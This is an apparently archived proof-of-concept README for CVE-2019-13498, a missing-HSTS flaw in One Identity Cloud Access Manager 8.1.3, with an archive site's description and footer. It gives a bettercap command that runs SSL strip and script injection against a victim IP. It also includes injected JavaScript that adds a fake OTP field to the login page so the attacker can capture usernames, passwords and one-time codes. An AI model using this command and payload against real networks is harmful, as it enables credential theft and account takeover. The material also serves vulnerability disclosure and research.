CVE-2019-13498 PoC — One Identity Cloud Access Manager 安全特征问题漏洞

Source

https://github.com/FurqanKhan1/CVE-2019-13498

Associated Vulnerability

Title:One Identity Cloud Access Manager 安全特征问题漏洞 (CVE-2019-13498)
Description:One Identity Cloud Access Manager（CAM）是美国One Identity公司的一套基于Web的访问管理解决方案。该产品支持单点登录、多因素身份验证、访问控制和审计等功能。 One Identity CAM 8.1.3版本中存在安全漏洞，该漏洞源于程序没有使用HTTP Strict Transport Security。攻击者可利用该漏洞实施中间人攻击。

Description

CVE-2019-13498

Readme

# CVE-2019-13498

Exploit Title: MITM - Missing HSTS causing credential theft and content manipulation<br>
Date: 07/10/2019<br>
Exploit Author: Furqan Khan<br>
Vendor Homepage: https://www.oneidentity.com/<br>
Software Link: https://www.oneidentity.com/products/cloud-access-manager/<br>
Version: 8.1.3<br>
Tested on: Kali Linux , Windows 7 ,Ubantu 16.04<br>

#### To conduct the MITM attack and steal username , password and OTP , we make use of bettercap 1.6.Ideally , the OTP box is populated at the second page of the application , after the user sucessfully autheticates with a legitimate username and password. However we use SSL strip and content manupulation to inject a OTP text box at the same page where username and password are prompted. A victim may think this change is comming from application itself , and shall share username , password and OTP and submit the form.The attacker who has set up bettercap and proxy , will get the credentials and OTP , and shall use the same to login to the application.


# The bettercap command used is :
##### bettercap -T 192.168.1.103 --proxy -P post --proxy-module injectjs --js-file inject_js.js ####

![bettercap.jpg](https://github.com/FurqanKhan1/CVE-2019-13498/blob/master/1.PNG)

Here 192.168.1.103 is the IP address of the victim. If we do not know it , we can use bettercap , to sniff and manipulate content of the entire LAN (common network of attacker and victim)

## The content of inject_js.js is given as under ##

```html
<script>
 
function replace_payload()
{  


     var append_str='<div class="wrap-input100 validate-input m-b-20" data-validate="Password"><input class="cui-textbox" type="password"  id="passwordTextbox" name="passwordTextbox"><span class="focus-cui-textbox" data-placeholder="OTP"></span></div>';

     var text_div=$(".m-b-20");

     text_div.append(append_str);

    }

    function control(){setTimeout(replace_payload,2000);} control();
    
</script>
```
##### Now when the victim would browse the product (Cloud access manager) , due to cache piosining and SSL strip (Bettercap) ,an OTP text box will be injected in the page that would be served to victim via the injected javascript snippet #####
![injected.jpg](https://github.com/FurqanKhan1/CVE-2019-13498/blob/master/2.PNG)

##### Given that the connection is downgraded to http via ssl-strip , now all traffic shall be visible to the attacker.Thus we can intercept the traffic , and see the username , password and OTP submitted by victim. #####

![intercept.jpg](https://github.com/FurqanKhan1/CVE-2019-13498/blob/master/3.PNG)

#####  Bingo ! That was easy ! #####

File Snapshot


 [4.0K]  /data/pocs/578b6f322838933d15353de2ff97e59882680ecc
├── [129K]  1.PNG
├── [ 35K]  2.PNG
├── [148K]  3.PNG
└── [2.6K]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!